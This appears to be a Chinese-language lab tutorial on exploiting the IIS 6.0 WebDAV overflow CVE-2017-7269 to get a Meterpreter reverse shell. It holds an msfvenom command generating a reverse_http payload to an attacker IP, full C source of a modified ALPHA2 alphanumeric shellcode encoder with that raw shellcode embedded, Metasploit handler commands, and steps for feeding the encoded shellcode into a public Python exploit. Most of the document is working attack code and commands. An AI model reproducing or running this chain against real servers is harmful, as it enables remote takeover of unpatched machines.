针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf

环境：

Kali攻击机1 IP：192.168.114.140

Win7攻击机2 IP（安装gcc和python2.7）：192.168.114.130

Windows server 2003目标主机（开启webdev服务）：192.168.114.132

 

在攻击机1中的操作：

使用msfvenom生成shellcode ：

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c



在攻击机2中的操作：

创建一个文本文件，将以下代码拷贝进去，并修改成.c后缀名的任意命名文件（代码参照：https://bbs.ichunqiu.com/thread-21294-1-1.html 由于encode.c编译有误，下面是经过我修改和翻译后的encode.c，这个Alpha2是Linux下的源码源Appha2地址是：http://skypher.com/wiki/index.php/ALPHA2）：

// Alpha2.cpp : Defines the entry point for the console application.
//

#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#include <winsock.h>
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."
/*
________________________________________________________________________________

,sSSs,,s,  ,sSSSs,  ALPHA 2: Zero-tolerance.
SS"  Y$P"  SY"  ,SY
iS'   dY       ,sS"   Unicode-proof uppercase alphanumeric shellcode encoding.
YS,  dSb    ,sY"      Copyright (C) 2003, 2004 by Berend-Jan Wever.
'"YSS'"S' 'SSSSSSSP   <skylined@edup.tudelft.nl>
________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at: http://www.gnu.org/licenses/gpl.html or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA  02111-1307
USA.

Acknowledgements:
Thanks to rix for his phrack article on aphanumeric shellcode.
Thanks to obscou for his phrack article on unicode-proof shellcode.
Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/

#define mixedcase_w32sehgetpc           "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc           "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816"
#define mixedcase_ascii_decoder_body    "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body    "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"
#define mixedcase_unicode_decoder_body  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body  "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"

struct decoder {
char* id; // id of option
char* code; // the decoder
} mixedcase_ascii_decoders[] = {
{ "nops",     "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
{ "eax",      "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ecx",      "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edx",      "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
{ "ebx",      "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esp",      "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ebp",      "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esi",      "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edi",      "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp]",    "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+4]",  "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]",  "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+C]",  "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "seh",      mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_decoders[] = {
{ "nops",     "IIIIIIIIIIII" uppercase_ascii_decoder_body },
{ "eax",      "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ecx",      "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edx",      "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
{ "ebx",      "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esp",      "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ebp",      "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esi",      "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edi",      "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp]",    "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+4]",  "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+8]",  "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+C]",  "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "seh",      uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = {
{ "nops",     "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
{ "eax",      "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ecx",      "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edx",      "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
{ "ebx",      "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esp",      "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ebp",      "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esi",      "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edi",      "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp]",    "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+4]",  "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]",  "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+C]",  "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "seh",      mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = {
{ "nops",     "777777777777777777777777" uppercase_ascii_decoder_body },
{ "eax",      "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ecx",      "7777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edx",      "7777777777777777777777RY" uppercase_ascii_decoder_body },
{ "ebx",      "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esp",      "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ebp",      "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esi",      "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edi",      "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
{ "[esp-C]",  "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-8]",  "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-4]",  "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp]",    "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+4]",  "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+8]",  "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+C]",  "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
{ "seh",      uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_decoders[] = {
{ "nops",     "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "eax",      "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ecx",      "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "edx",      "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebx",      "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esp",      "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebp",      "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esi",      "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "edi",      "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "[esp]",    "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
{ "[esp+4]",  "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_decoders[] = {
{ "nops",     "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "eax",      "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ecx",      "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "edx",      "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebx",      "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esp",      "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebp",      "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esi",      "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "edi",      "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "[esp]",    "YAIAIAIAIA44" uppercase_unicode_decoder_body },
{ "[esp+4]",  "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = {
{ "nops",     "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "eax",      "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ecx",      "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edx",      "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebx",      "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esp",      "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebp",      "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esi",      "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edi",      "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp]",    "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp+4]",  "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = {
{ "nops",     "44444444444444" uppercase_unicode_decoder_body },
{ "eax",      "PPYA4444444444" uppercase_unicode_decoder_body },
{ "ecx",      "44444444444444" uppercase_unicode_decoder_body },
{ "edx",      "RRYA4444444444" uppercase_unicode_decoder_body },
{ "ebx",      "SSYA4444444444" uppercase_unicode_decoder_body },
{ "esp",      "TUYA4444444444" uppercase_unicode_decoder_body },
{ "ebp",      "UUYA4444444444" uppercase_unicode_decoder_body },
{ "esi",      "VVYA4444444444" uppercase_unicode_decoder_body },
{ "edi",      "WWYA4444444444" uppercase_unicode_decoder_body },
{ "[esp]",    "YA444444444444" uppercase_unicode_decoder_body },
{ "[esp+4]",  "YUYA4444444444" uppercase_unicode_decoder_body },
{ NULL, NULL }
};

struct decoder* decoders[] = {
mixedcase_ascii_decoders, uppercase_ascii_decoders,
mixedcase_unicode_decoders, uppercase_unicode_decoders,
mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,
mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders
};
//evil你自己的shllcode，用的话需修改源码
//这里写入msf生成的shellcode
char evil[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
"\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
"\xe8\x75\x01\x00\x00\x2f\x37\x49\x69\x45\x65\x57\x69\x66\x79"
"\x4f\x59\x71\x7a\x69\x76\x50\x63\x38\x64\x66\x41\x67\x50\x79"
"\x33\x6e\x54\x49\x71\x4b\x42\x44\x46\x37\x2d\x4d\x53\x66\x5a"
"\x71\x57\x4c\x57\x4b\x58\x70\x6d\x4c\x56\x75\x6b\x50\x6e\x34"
"\x5f\x4f\x4f\x69\x31\x4b\x6d\x59\x6c\x5f\x57\x6b\x61\x36\x59"
"\x78\x41\x46\x5a\x76\x6c\x58\x6b\x63\x50\x6f\x53\x53\x57\x71"
"\x5f\x58\x48\x77\x41\x4c\x69\x30\x57\x65\x41\x78\x64\x45\x59"
"\x64\x77\x76\x31\x64\x32\x67\x58\x34\x7a\x50\x56\x39\x63\x71"
"\x37\x6d\x39\x50\x36\x74\x5a\x77\x39\x32\x36\x57\x30\x53\x58"
"\x49\x66\x44\x59\x58\x57\x49\x74\x4d\x4f\x47\x36\x6c\x5a\x51"
"\x65\x38\x44\x69\x7a\x34\x75\x37\x6c\x4d\x4c\x4e\x44\x5a\x6b"
"\x74\x47\x42\x72\x4d\x76\x38\x4f\x64\x58\x64\x46\x32\x50\x70"
"\x7a\x4d\x46\x75\x74\x35\x43\x32\x33\x63\x50\x33\x6a\x46\x62"
"\x4e\x4e\x79\x4b\x38\x72\x31\x79\x4d\x4b\x56\x51\x63\x70\x67"
"\x63\x34\x57\x73\x68\x4f\x57\x65\x4a\x38\x55\x31\x71\x36\x73"
"\x68\x2d\x33\x43\x53\x4d\x6f\x79\x67\x70\x55\x52\x57\x2d\x4c"
"\x56\x68\x73\x70\x4a\x62\x2d\x35\x6a\x4f\x2d\x41\x45\x4d\x00"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x60"
"\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96"
"\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff"
"\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00"
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93"
"\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96"
"\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75"
"\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36"
"\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb\xf0\xb5\xa2\x56"
"\x6a\x00\x53\xff\xd5";

void version(void) {
printf(
"________________________________________________________________________________\n"
"\n"
"    ,sSSs,,s,  ,sSSSs,  " VERSION_STRING "\n"
"   SS/'  Y$P/' SY/' ,SY \n"
"  iS'   dY       ,sS/'   Unicode-proof uppercase alphanumeric shellcode encoding.\n"
"  YS,  dSb    ,sY/'      " COPYRIGHT "\n"
"  '/'YSS'/'S' 'SSSSSSSP   <skylined@edup.tudelft.nl>\n"
"________________________________________________________________________________\n"
"\n"
);
exit(EXIT_SUCCESS);
}

void help(char* name)
{
printf(
"\n"
"  使用方法: %s [OPTION] [BASEADDRESS]\n"
"\n"
"  ALPHA 2编码您的IA-32 shellcode仅包含字母数字字符，结果可以是只有大写字母和写字母和(或)unicode的证明，它是您的原始shellcode的编码版本，由一些填充的baseaddress代码组成，解码器程序和编码的原始shellcode，这将适用于任何目标操作系统，所得到的shellcode需要具有RWE访问权限，以修改自己的代码并解码存储器中的原始shellcode.\n"
"\n"
"BASEADDRESS\n"
"  解码器常需要在指定的寄存器中具有基地址.baseaddress代码将baseaddress从给定的寄存器或堆栈位置复制到适当的寄存器中.\n"
"eax, ecx, edx, ecx, esp, ebp, esi, edi\n"
"  从给定的寄存器中取出baseaddress.（使用esp的Unicode baseaddress代码将覆盖由ebp指向的内存的字节！）\n"
"[esp], [esp-X], [esp+X]\n"
"  从堆栈中取出baseaddress\n"
"seh\n"
"  Windows的结构化异常处理程序（seh）可以用于在win32系统上自动计算baseaddress.此选项不适用于unicode-proof shellcode，大写版本不是100 %%可靠.\n"
"nops\n"
"  没有baseaddress代码，只是填充. 如果您需要从源代码中获取baseaddress，请使用此选项（结合--nocompress），并使用自己的代码替换nops. ascii解码器需要在寄存器ecx和edx中的基地址，仅在ecx中的unicode-proof解码器.\n"
"\n"
"-n\n"
"  不输出一个换行后的shellcode.\n"
"--nocompress\n"
"  baseaddress代码使用'dec'指令来降低所需的填充长度. 因此，unicode-proof代码会覆盖shellcode前面的一些字节. 如果不想使用'dec'，请使用此选项.\n"
"--unicode\n"
"  把shellcode unicode-proof.这意味着当它被转换为Unicode（在每一个字节中插入一个'0'）才被执行.\n"
"--uppercase\n"
"  将shellcode全部转换成大写字符，使用更多的字节然后混合shellcode\n"
"--sources\n"
"  为给定的组合--uppercase和--unicode输出一串基地址（BASEADDRESS）选项\n"
"--help\n"
"  显示帮助和退出\n"
"--version\n"
"  输出版本信息和退出\n"
"\n"
"  请查看源文件获取更多细节和复制条件，该软件不受保护，不用作商业及特定用途\n"
"\n"
"致谢:\n"
"  Thanks to rix for his phrack article on aphanumeric shellcode.\n"
"  Thanks to obscou for his phrack article on unicode-proof shellcode.\n"
"  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.\n"
"\n"
"  报告bugs：<skylined@edup.tudelft.nl>\n",
name
);
exit(EXIT_SUCCESS);
}

//-----------------------------------------------------------------------------
int main(int argc, char* argv[], char* envp[])
{
int   uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,
nonewline = 0, nocompress = 0, options = 0, spaces = 0;
char* baseaddress = NULL;
int   i, input, A, B, C, D, E, F;
char* valid_chars;
int j=0;
//Random seed
//struct timeval tv;
//struct timezone tz;
//ttimeofday(&tv, &tz);
//srand((int)tv.tv_sec*1000+tv.tv_usec);

// Scan all the options and set internal variables accordingly
for (i=1; i<argc; i++)
{
if (strcmp(argv[i], "--help") == 0) help(argv[0]);
else if (strcmp(argv[i], "--version") == 0) version();
else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
else if (strcmp(argv[i], "--sources") == 0) sources = 1;
else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
else if (baseaddress == NULL) baseaddress = argv[i];
else
{
fprintf(stderr, "%s: 不止一个BASEADDRESS option: '%s' 和 '%s'\n"
"使用 '%s --help' 获取更多信息.\n",
argv[0], baseaddress, argv[i], argv[0]);
exit(EXIT_FAILURE);
}
}

// No baseaddress option ?
if (baseaddress == NULL)
{
fprintf(stderr, "%s: 缺少 BASEADDRESS 选项.\n"
"使用 '%s --help' 获取更多信息.\n", argv[0], argv[0]);
exit(EXIT_FAILURE);
}
// The uppercase, unicode and nocompress option determine which decoder we'll
// need to use. For each combination of these options there is an array,
// indexed by the baseaddress with decoders. Pointers to these arrays have
// been put in another array, we can calculate the index into this second
// array like this:
options = uppercase+unicode*2+nocompress*4;
// decoders[options] will now point to an array of decoders for the specified
// options. The array contains one decoder for every possible baseaddress.

// Someone wants to know which baseaddress options the specified options
// for uppercase, unicode and/or nocompress allow:
if (sources)
{
printf("可用的选项 %s%s 包括文字数字的shellcode:\n",
uppercase ? "uppercase" : "mixedcase",
unicode ? " unicode-proof" : "");
for (i=0; decoders[options][i].id != NULL; i++)
{
printf("  %s\n", decoders[options][i].id);
}
printf("\n");
exit(EXIT_SUCCESS);
}
//TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI

if (uppercase)
{
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
} else
{
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
}

// Find and output decoder

for (i=0; stricmp(baseaddress, decoders[options][i].id) != 0; i++)
{
if (decoders[options][i+1].id == NULL)
{
fprintf(stderr, "%s: 无法识别的BASEADDRESS选项 ‘%s'\n"
"使用 '%s %s%s--sources' 获取一串 BASEADDRESS 选项.\n",
argv[0], baseaddress, argv[0],
uppercase ? "--uppercase " : "",
unicode ? "--unicode " : "");
exit(EXIT_FAILURE);
}
}
printf("%s", decoders[options][i].code);

//system("pause");
// read, encode and output shellcode

for (j; j<sizeof(evil);j++)
{
input=evil[j];
// encoding AB -> CD 00 EF 00
A = (input & 0xf0) >> 4;
B = (input & 0x0f);

F = B;
// E is arbitrary as long as EF is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
// normal code uses xor, unicode-proof uses ADD.
// AB ->
D =  unicode ? (A-E) & 0x0f : (A^E);
// C is arbitrary as long as CD is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D)
{
i = ++i % strlen(valid_chars);
}
C = valid_chars[i] >> 4;
printf("%c%c", (C<<4)+D, (E<<4)+F);
}

//最后显示出的一串字符就是编码后的shellcode
//可以这样使用命令行下：alpha2 esp
//esp指向了shellcode
printf("A%s", nonewline ? "" : "\n"); // Terminating "A"
exit(EXIT_SUCCESS);
}

复制刚刚用msfvenom命令所生成的shellcode到.c文件中的如下位置：



由于kali中的gcc编译出错，提示缺少头文件，我在攻击机2中使用gcc编译：



最后生成exe文件



在cmd下使用：



使用--help获取帮助



使用--upercase--unicode ESI



修改原poc（地址：https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py）：



回到攻击机1：

在Kali中打开msf做监听：

useexploit/multi/handler

setpayload windows/meterpreter/reverse_http

setLHOST 192.168.114.140

setLPORT 5555

exploit-j  在计划任务下进行渗透攻击(攻击将在后台进行)



再回到攻击机2：

执行修改后的python脚本



执行后会回连Kali攻击机 192.168.114.140的5555端口：







最后可以结合metasploit终端命令进一步操作：

参考地址：http://blog.csdn.net/mickeymouse1928/article/details/71107769